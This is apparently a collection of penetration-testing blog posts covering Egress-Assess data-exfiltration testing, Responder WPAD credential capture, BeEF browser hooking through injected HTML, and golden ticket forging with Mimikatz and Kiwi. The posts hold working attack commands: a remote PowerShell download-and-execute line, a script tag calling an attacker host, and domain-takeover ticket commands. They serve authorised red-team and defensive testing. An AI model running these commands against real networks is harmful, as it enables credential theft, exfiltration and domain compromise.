Egress-Assess and Owning File Data Exfiltration

Since its creation, Egress-Assess’s primary use-case has been to generate faux data, such as social security numbers, and attempt to exfiltrate that data over a variety of different protocols.  It’s use is both for pen testers and blue teamers that are trying to gauge whether or not an/their organization can detect sensitive data that is egressing their network boundary.  Data loss can have a huge impact on customers, just read any major breach in the past 12 months.  Social security and credit card numbers are great for a quick demo, but sometimes real data is needed to demonstrate impact.  Both Steve (@424f424f) and myself recognize this, and are happy to say we’ve added in the ability to exfiltrate real files with Egress-Assess.

Why did this feature get added in?  Our threats are doing this, that’s why.  Hacking into companies isn’t just about getting shells anymore.  Attackers are breaking into companies to steal their data.  This threat is real, and as professional pen testers/red teamers, we should be looking to emulate the threats that our customers are facing.  Evolving our tradecraft to include data exfiltration testing can directly give value to our customers.  When we can point to the fact that 7 gigs of credit card numbers were exfiltrated from our customer’s network and not a single one was detected, then we can show exactly where they need to improve upon.

As you can see, Egress-Assess now supports a –file option (-Datatype with path to file in powershell):

EA Help with File

Nearly all modules currently support DNS file transfers.  The only modules which still requires an update is the dns_resolved module, however dns (straight) does support file transfers, and transfers over DNS in powershell.  The difference between the two is dns_resolved uses recursive lookups to transfer file data, and dns (straight) points DNS packets directly to the DNS/Egress-Assess server you specify.

DNS files transfers automatically attempt to use the maximum size allowable within a DNS packet to transfer files.  You may see the total packet number change mid transfer, and this is due to Egress-Assess adjusting the amount of data sent in each packet to remain protocol compliant.  DNS file transfers in Egress-Assess use the following logic:

  1. While there is data to send, continue sending data
  2. Packets sent are sent with the Packet number, a delimiter (“.:|:.”), and then file data.  All of this information is base64 encoded.
  3. The server receives the packet, ensures it matches the above layout, and then responds with the packet number that was received, and the string “allgoodhere”.
  4. If the client/sender receives the response packet, move on to sending the next packet.  If no response is received within 2 seconds, retransmit.

Sending file data

Once there is no more data to send, the sender:

  1. Sends a DNS TXT packet with the string “ENDTHISFILETRANSMISSIONEGRESSASSESS” which is concatenated with the name of the file that is being transferred.
  2. The server receives the end packet, and writes out the data received throughout the transmission, in order, to the filename received in the end transmission packet.

EOF

We developed the client and server to speak in this manner to ensure all data is received, and will be written out in the proper order.  A quick md5sum test shows that we actually have recreated the same exact file on the server that was sent over DNS.

MD5 Sum FIles

I hope this helps explain DNS transfers, and everything in this latest release of Egress-Assess.  If anyone has any questions, feel free to hit me (@ChrisTruncer) or Steve (@424f424f) up on twitter or in #Veil on freenode!

Hasher Re-Write/Update

Github Repo: https://github.com/ChrisTruncer/Hasher

I have made some changes to Hasher, ideally I’d like to think for the better. Hasher was originally a single, large, python script that was used to hash plaintext strings, and compare a hash value to a plaintext string.  Hasher still performs the same actions, generates hashes or compares them with a plaintext string, but Hasher now has been converted into a framework which will allow myself, or anyone else, to easily add in support for different hashes.

Usage is still essentially the same, however there is no longer an interactive menu.  Hasher is now completely command line based.

Hasher Menu

To see a list of all hash-types that Hasher currently supports, simply run ./Hasher.py –list

HashTypes

Once you have the hash-type you want to generate a hash for, it’s fairly simple to generate.  For example, if you were looking to generate (-G) a md5 hash for the string “password123”, you would do it this way:

./Hasher.py -G --plaintext password123 --hash-type md5

You should see output similar to the following:

MD5 Generated

Harmj0y provided me with a great idea when using Hasher.  He had a use case where he just wanted Hasher to dump out all possible hashes for a specific plaintext string, but didn’t want to have to generate all hashes manually.  I added in the ability to generate all possible hash types based on the information provided.  To do this, you would run the following command:

./Hasher.py --plaintext password123 --hash-type all -G

When you run this, you should see output similar to the following:

Hasher All Output

Another capability that Hasher has, is it can take a plaintext string and hash, and then compare (-C) the the plaintext string to ensure it matches the hash.  This has been useful for me when needing to check if a hash and string “equal” each other, without submitting any of the information online.  So, lets continue the previous example.  If you wanted to verify that the plaintext string “password123” matches the md5 hash “482c811da5d5b4bc6d497ffa98491e38”, your command should look like this:

./Hasher.py -C --plaintext password123 --hash 482c811da5d5b4bc6d497ffa98491e38 --hash-type md5

True Comparison

For testing purposes, if the hash and plaintext string didn’t match up, it would look like the following:

False Hasher Comparison

 

Hash Module Development

Adding in support for new hash types is significantly easier now.  Every *.py file within the “hash_ops” folder is automatically picked up and parsed by Hasher.  Within the hash_ops folder, is a text file called “hash_template.txt”.  To add in a new hash-type, simply copy the template file and rename it with a .py extension.  There’s only two required methods within each module:

  • __init__ – This method needs to contained a self.hash_type attribute.  This is what is used by the user from the command line to select a specific hash.  Any other information within the __init__ method is optional.
  • generate – The generate method is called by Hasher to generate a hash.  This method has complete access to all options passed in from the command line by the user.  It must return the hash of the plaintext string.

For a sample, this is what the md5 module looks like:

Hasher MD5 Updated

Hopefully, this helps explain the minor usability changes to Hasher, and elaborates on how it’s now easier to add support for new hashes.  If anyone has any questions, feel free to reach out to me on twitter (@ChrisTruncer) or in #Veil on Freenode!

Exfiltrate Data via DNS with Egress-Assess

Egress-Assess Repo: https://github.com/ChrisTruncer/Egress-Assess

DNS is a channel that can usually be utilized to exfiltrate data out over a network.  Even in the event that a network you are operating in requires authenticating to a proxy for data to leave a network, users can typically make DNS requests which are forwarded on via the local DNS servers in the user’s network.  An attacker can utilize normal DNS functionality to forward data, C2, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for use in Beacon with Cobalt Strike.

A new module has been added in to Egress-Assess that allows you to utilize your system’s DNS server to exfiltrate data.  This is different from the existing DNS module within Egress-Assess.  The existing module send a DNS packet directly to the DNS server you specify, the “dns_resolved” module utilizes your network’s own DNS server.

To utilize the existing network’s DNS server, it will require some setup.  Raphael also has a blog post describing virtually the same configuration/setup that will be required to exfiltrate your data.

The first step I took was to create an A record egress.christophertruncer.com and point that to the server I intend on acting as my endpoint for the data I am exfiltrating.  Next, I created a NS record for a subdomain that I will use for exfiltrating data, and then point the NS record to the A record I just created (egress.christophertruncer.com).  My setup looks like the following:

DNS NS Record

Now, everything is setup and ready to go!  To use this, my sample Egress-Assess command would be:

./Egress-Assess --client dns_resolved --datatype ssn --ip test.christophertruncer.com

Since egress.christophertruncer.com acts as the nameserver for test.christophertruncer.com, all requests using the “test” subdomain are sent to egress, sending all data over DNS to an endpoint I control.

If you have any questions on this, feel free to shoot a tweet my way or hop in #veil on Freenode!

How to Develop Egress-Assess Modules

This post will document how to create server, client, and datatype modules for Egress-Assess.  I’ll document the necessary functions and attributes that the framework requires, and hopefully try to give some helpful info.

Some basic info before diving into the specifics of the differences between the module types.  All __init__ methods are able to access any command line parameter passed in by the user.  If any module requires information from the command line (hint, all of them do in one way or another), you should declare attributes (based off of the command line options) for each class instance within the __init__ method.

All template modules are currently a .txt file.  Once you’ve created your module and want to test/use it, rename it to a .py file within its respective folder.

Server Modules

servermoduletemplate

The first module type to discuss are server modules.  These modules will allow the framework to be put into a “server mode” which typically entails listening and waiting for the client to connect into the server, and transmit data to the server.  A blank server module template is available at this link to use as a base for creating a server module.

The self.protocol attribute is the only required attribute for server modules.  This attribute is what is displayed to the user when typing --list-servers.  This is also the value that is used to identify and use the server module when used in conjunction with the --server flag.

The serve function is the only required function for the server class.  It is what is used by the framework to start the server.  You can create as many different functions as needed for the server class, but the serve function should be considered the “main” of the server module.

Client Modules

clientmoduletemplate

The client module will typically be used to transmit data over a specific protocol, vs. receiving any data.  A blank client module template can be found at this location.

The self.protocol attribute is the only required attribute for client modules.  This attribute is what is displayed to the user when typing --list-clients.  This is also the value that is used to identify and use the server module when used in conjunction with the --client flag.

The transmit function is the only required function for client modules.  It is the function called by the framework  to transmit data.  The transmit function has a variable passed into it (data_to_transmit) which is the data that the client is supposed to transmit to the server.  Similar to server modules, the transmit function should be considered like the “main” function of client modules.  You can create as many additional functions necessary for the client module’s use, but the transmit function is what will be invoked by the framework.

Datatype Modules

datatype template

The datatype module is used to generate any sort of data.  Currently, there’s support for modules that generate social security numbers or credit card numbers.  A blank datatype template can be found at this location.

The self.cli, self.description, and self.filetype attributes are required for datatype modules.  The self.cli attributes is part of what is displayed when the user types --list-datatypes and is what is used to uniquely select the specific datatype to use with the --datatype flag.  This should be short since it is what is passed in by the user in the command line.

The self.description attribute can be used to better describe the datatype that is generated by the module.  This is also displayed when a user types --list-datatypes.  For example, the credit card module has “cc” as the self.cli attribute and “Credit Card Numbers” as the self.description attribute.

The self.filetype is currently only used when attempting to exfil data over ftp, but it is a required attribute.  This is to let the framework know if the data is text or binary data.  If text, keep the filetype attribute as text. Otherwise, change it.

The generate_data function is a required function for datatype modules.  It is what is invoked by the framework to generate the specific type of data requested by the user.  It must also return the total “data” generated.  As an example, the social security number datatype module generates X number of credit cards, and they are returned into the framework at the conclusion of the generate_data function.

Helper Functions

There are a few helper functions that are accessible to all modules.  The functions are in the helpers.py file within the framework.  However, a brief description of this is:

  • helpers.randomNumbers(X) – returns “X” number of random numbers
  • helpers.ea_path() – returns the current path the Egress-Assess is in
  • helpers.writeout_text_data(incoming_data) – writes out a file containing the data passed into function, and returns the name of the file

 

I hope this helps explain how to write any of the currently available modules.  If anyone has any questions, feel free to hit me up on twitter or on IRC in #veil!

Egress-Assess in Action via Powershell

For a week or two now, rvrsh3ll (@424f424f) has been working on creating a powershell client for Egress-Assess that would allow Windows users to simply load the script in memory and use it to test egress filters.  As of yesterday evening, his script has been merged into Egress-Assess, and is now available in the Github repository.

@424f424f went one further and wanted to send some screenshots to demo any potential detections when sending data outside of his network.  But first, let’s demo the powershell script.

Loading up the powershell script is easy, and doesn’t require any file to be placed on disk.  To do this, the Windows machine will need to have internet access.  Start powershell on the Windows machine you want to run Egress-Assess from, and use the following command to load it into memory:

IEX (New-Object Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/ChrisTruncer/Egress-Assess/master/Invoke-EgressAssess.ps1‘)

In-Memory Download EA

Now the powershell script is in memory and ready for use!  Usage is near identical with the python client.  To send data over http to another system running Egress-Assess you can use the following command:

Invoke-EgressAssess -client https -datatype cc -Verbose -ip 192.168.63.149

EA Powershell https

Server side, we can see that the data is received.

Server received powershell http

@424f424f has a Snorby instance in use and ran Egress-Assess through it.  The following were some of the alerts that were generated (you want to hope that similar results are generated for your clients!).

Snorby credit cards Snorby social security

If anyone has any questions on the usage, be sure to hit me up.  Otherwise, a big thanks again to Rvrsh3ll (@424f424f) for sending this awesome addition.

Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate if their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy to use solution that would simulate the extraction of sensitive data from my machine to another.  While trying to plan out a tool, I targeted a few protocols commonly used by attackers:  FTP, HTTP, and HTTPS.  To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two different sensitive data types that would likely have signatures across organizations are social security numbers and credit card numbers and I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server where data would be passed over network boundaries. Once cloned from the repository, the dummy data can be transferred from one machine to another. 

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running.  With this going, all we need to do now is configure the client to connect to the server!  This is simple, can can be done by telling Egress-Assess to act in client mode and use ftp, provide the username and password to use, the ip to connect to, and the datatype to transmit (in this case, social security numbers).  Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

ftpclientupdated

Within the same directory as Egress-Assess, a “data” directory will be created.  Within it is where all transmitted files will be stored.  At this point, the transfer is complete via FTP!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the “–data-size” flag.  If we want to send approximately 15 megabytes of credit card data to our web server over http, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess.  Future revisions will include making a more modularized tool so users can easily add support for new protocols, and new data types for transfer.  If there are any other requests, I’d love to hear them!

Getting Hooked up with Responder and Beef

Responder is a really effective tool that I’ve written about before which can be used to easily obtain user credentials on a network.  However, in Responder’s 2.0 release, the ability to perform HTML injection attacks were added to the tool.  This capability can be easily utilized to perform a variety of nefarious actions against our targets.  The first tool that I thought using to leverage the HTML injection capabilities of Responder, is Beef.  Beef is described as being a browser exploitation framework.  The goal of an attacker utilizing Beef would be to “hook” another user’s browser.  Once hooked, Beef contains a large number of modules that can be used to attack the victim’s web browser (which I would perform a disservice if I tried to describe all of Beef’s capabilities in a single post).  So the attack that I’m going to demonstrate is using Responder’s ability to inject HTML and hook systems on the network I am targeting with Beef.

Edit: @Antisnatchor provided some really good feedback in the comments.  I think it’s worth everyone reading what he said, so they are copied here:

“Few things to add, change the following in the main config.yaml config file:

– reduce xhr_poll_timeout to 500 (milliseconds), so polling will happen twice a second
– change hook_file to jquery.js or something different to change the hook name (more stealthy), as well as hook_session_name and session_cookie_name to different values.
– enable the Evasion extension, just use ‘scramble’ + ‘minify’ as obfuscation techniques. This will minify/pack JS and scramble variables like BeEF/beef to random ones.
– change default BeEF credentials and web_ui_basepath

I would also add the BeEF hook tag in rather than .

Then once it’s up, you can automate module lanching to multiple hooked browser based on fingerprinting results via the RESTful API.” 

First, you’re going to need to get Beef started on your attacking platform.  If you’re using Kali, it’s located within the /usr/share/beef-xss directory.  Once within it, simple type “./beef” and wait as the framework starts up.  Your console should look similar to the following once it is ready to go:

Beef startup

Next up, we need to slightly modify Responder’s config file.  If you haven’t already, clone the project to your attacking platform, and then open up Responder.conf in a text editor.  Within the Responder.conf file you’re going to want to change the “HTMLToServe” value.  To carry out the attack, we want to inject Beef’s javascript file used to hook browsers.  I just changed the value to be:

HTMLToServe = <html><head></head><body><script src="http://192.168.63.149:3000/hook.js" type="text/javascript"></script></body></html>

Your config should look similar to the following now:

Responder Config

With this added in, Responder will inject the javascript containing our beef hook into any page that it is able to do so.  First, I’m going to need to start Responder.  The options that I am passing into Responder tells it to listen on my local IP, stand up a rogue wpad proxy, and display verbose messages.

Start Responder

With both Beef and Responder up and running, it’s time to get our hooks!  To test this out, I’m going to just have the web browser from my Windows 7 victim VM attempt to navigate to http://intranet/.  When it requests the web page, Responder will serve up the a web page.  In my case, I don’t have an actual machine called “intranet” within my lab network, so Responder will just serve up a web page only containing the Beef hook code.

Web-Requested

Not only did Responder see the web request, but it was also able to obtain the NTLMv2 hash use by the current user “sonofflynn”.  If I were to look at the web page on my Windows 7 VM, it just shows a blank page.  However, the blank page has also loaded up my beef hook, and after logging into the Beef console, I can see it’s successfully been hooked.  With our victim’s browser hooked, we can now perform a wide variety of enumeration and attacks against or through the victim’s browser.  I highly recommend to review the large number of posts that talk about beef and the variety of attacks it contains.

Beef Hooked

I have had at times Responder act “funny” by serving up what appears to be random ascii code vs an actual website.  I have also had issues with it injecting the HTML code at times.  However, this seems to work best for me to get repeatable results and hooks.  If there’s something that I’ve missed, or a better way to inject html code/beef hooks/etc. I’d love to hear about it and get to learn a better way (or maybe the right way :)).  Otherwise, hope that this helps, and feel free to hit me up for any questions!

Responder & User Account Credentials – First Come, First Served

Responder is an awesome tool that was created by Laurent Gaffie and can be extremely effective to use on pen tests.  I recently had the opportunity to use Responder, and it returned valid domain credentials within about 10 minutes.  I wanted to write this post as an opportunity to document what worked for myself.  With that said, Larry Spohn also wrote an excellent blog post on essentially the same attack which can be viewed here, so be sure to go and check that post out as well!

Responder can return results two different ways.  We can try to receive the NTLM Challenge hash(es) from workstations, or Responder can return credentials via basic authentication.  Ideally, the easiest for an attacker to work with will be basic auth based authentication due to the data being easily reversible since it is base64 encoded.

The specific vulnerability that is being attacked in this situation is that workstations will be configured to automatically detect proxy settings for the network they are operating on by default.  When a workstation attempts to find the proxy settings needed, it does so by requesting for “WPAD” initially over DHCP.   If the workstation doesn’t receive a response, it will then make multiple DNS requests.  If DNS also doesn’t return any results, the workstation will finally fall back to requesting over NetBIOS (source). If configured to do so, Responder will can act as a rogue wpad proxy.  Responder can then serve a PAC file (configured as you see fit) and attempt to proxy all connections through itself.

One trick Responder can do (if configured to do so) is to respond to http requests from workstations that are attempting to access local resources (such as http://intranetsite).  The nifty aspect to this trick is to the user, the pop-up will appear as a normal looking authentication box that is prompting the user to enter their credentials.  Once entered, the credentials are transferred to the attacker, base64 decoded, and displayed to the attacker.  So, that’s the background to this attack, how about lets check it out?

First, we’re going to need to configure how Responder is going to operate on the network.  We’re going to need to pass it a couple command line options:

  • -i <IP Address or network interface> – The IP address to listen on
  • –wpad – Tells Responder to start a “rogue” wpad proxy server
  • -b – Tells Responder to return Basic Authentication information vs. NTLM
  • -F – Tells Responder to force NTLM or Basic authentication from any machine attempting to access the wpad file
  • -f – Tells Responder to fingerprint the host

Starting Responder

As you can see, Responder is pretty simple to setup and get up and running.  Once the previous command has been run, you should see something similar to the following:

Responder Started

This is roughly what Responder is going to look like once it is up and running.  For now, you can sit and wait for information to start coming in.  A good time to utilize Responder is when you’re first getting started on an assessment.  Responder can be one of the first tools you get running, and you can just leave it be and check back in on the results later.

Once Responder has been running for a while, check out if there’s been any juicy information returned to us!  Below is a what your output will likely look similar to:

Responder Output

What’s awesome to see here, is the “HTTP-User & Password:” line!  We can see the username “testuser” and password “badpassword” were returned to us, so now we have the first set of user credentials!  From a user’s perspective, this is what the popup looked like on a Win 8.1 desktop:

WPAD Desktop

This is a fairly typical screen and users are *LIKELY* going to enter their account information without a second thought.

At any point, you can stop running Responder, and it will have logged all credential information into a file for viewing.  In my case, this is what I have on my attacker platform:

Responder Loot File

If the same user were to keep entering their username and password, there would be duplicate (or more) entries of the credentials within the loot file.

Responder is an extremely powerful tool that can be used to quickly grab credentials when plugged into a network segment that users are also operating on.  I highly recommend using it as it can be a great way to get an initial foothold into your target network.

Mimikatz, Kiwi, and Golden Ticket Generation

First off, I want to state that the purpose of writing this post is to help myself learn how to use Golden Tickets on assessments.  If you want to see some great write-ups about Golden ticket generation, be sure to look at these:

Those posts are significantly more authoritative on the subject than mine, I just wanted to write this out so I can reference this on assessments.

Golden tickets can offer an extremely powerful to escalate privileges for an attacker on a network, or obtain access to resources which are only available to a select group.  However, it’s absolutely worth mentioning that with this great power, pen testers need to take extra precaution to protect any golden tickets that they’ve created.  It’s highly recommended that any tickets created should be securely encrypted during your assessment, and securely deleted when it is no longer needed.

Golden Tickets can be generated two different ways.  The first way is through the kiwi extension in Metasploit, and the other is through Mimikatz’s stand alone application.  This post will show how to use both options to generate your ticket.  Lets start off with Metasploit’s Kiwi Extension.

At this point, I am going to assume that you have a meterpreter session, as SYSTEM, on the domain controller for the domain you are targeting.  Within your session, you want to load the kiwi extension by typing:

load kiwi

Load Kiwi

Now that the kiwi extension is loaded, when you type help, you should see the additional commands that are available for you.  The command that we’re interested in is golden_ticket_create.  In order to create the golden ticket, we’re going to need at least four pieces of information (tickets can be further customized with additional information, but the generation process needs a minimum of four):

  • The Domain Name
  • The Domain SID
  • The krbtgt account’s nt hash
  • The user account you want to create the ticket for

MSF Golden Ticket Create

To get this information, you can just interact with the meterpreter session you already have active.  Drop into a shell, and run:

whoami /domain

Domain Sid

The domain SID starts at the S-1… and goes to …70370.  Copy and paste that information into a text file.  Next up, grab the domain name.  One way I like to do this is just running:

ipconfig /all

Find Domain Name

In this case, I can see (and I know) the domain name is PwnNOwn.com.  So, this info should also be saved off to a text file.  The last big hurdle that you will need is the nt hash from the krbtgt account.  Since you should be on the DC, perform a hashdump and obtain the krbtgt hash.

Now that we have all of the required information, we can generate a golden ticket!  At this time, go ahead and determine the user account you are wanting to impersonate, or, you can actually use an account that is nonexistent.  Now, it’s just getting everything in place for the command.  In our case, the command looks like this:

golden_ticket_create -d PwnNOwn.com -k <nthash partially redacted> -s S-1-5-21-522332750-710551914-1837870370 -u invaliduser -t /root/Downloads/invaliduser.tck

MSF Ticket Created

We can see from the previous picture that the ticket was successfully created and written out.  The user that we are impersonating is “invaliduser”, and the ticket is saved to /root/Downloads/invaliduser.tck.

Now that the ticket has been created, it’s time to apply it to our current session.  To do this you want to type the following command:

kerberos_ticket_use /root/Downloads/invaliduser.tck

Ticket applied

In the above screenshot, I cleared all existing tickets, then applied the created ticket, and then we can see the golden ticket in use.  Note: you don’t have to purge existing tickets, but I did for demonstration purposes.

Now that the ticket has been applied, a low level user account can now act as a Domain Administrator:

MSF Ticket Applied

The user account could not previously access the DC’s C$ share, but with the ticket applied, it can!  We’re now operating with the same level of permissions as a DA!

 

So, our other option for generating and using golden tickets is to use the mimikatz binary.  You can download that from here.  Once downloaded, navigate to the mimikatz binary and start it.  We can re-use the information that we already have to generate our golden ticket.  To generate the ticket, you’re going to run a command similar to the following:

kerberos::golden /user:invaliduser2 /domain:PwnNOwn.com /sid:S-1-5-21-522332750-710551914-1837870370 /krbtgt:<ticket partially redacted> /ticket:invalidadmin.tck /groups:501,502,513,512,520,518,519

(Thanks to Benjamin Delpy (@gentilkiwi) for letting me know that I failed at redacting my own krbtgt hash, haha.  This is why you should always post things from a test/lab domain :).  Pic below is now updated)

TicketcreatedWin

 

In this case, we’re creating a ticket for a non existent user account, the User ID is at its default value (500), and we’ve added groups that the user should be part of.  The ticket is saved to the invalidadmin.tck file within the same directory that the mimikatz binary is running from.

Now that the ticket has been created, we just want to apply it with Mimikatz.  This can be done by running the following command:

kerberos::ptt invalidadmin.tck

Win Ticket Submission

And to verify that we have administrative access to the domain controller again…

Access DC Share

We can actually also see from the DC that the Logon was successful, even though it was with an account that doesn’t exist within the domain!

Windows Log

And that’s about it!  Writing this out helped me gain a better understanding about generating and using golden tickets, hope that it can help someone else too!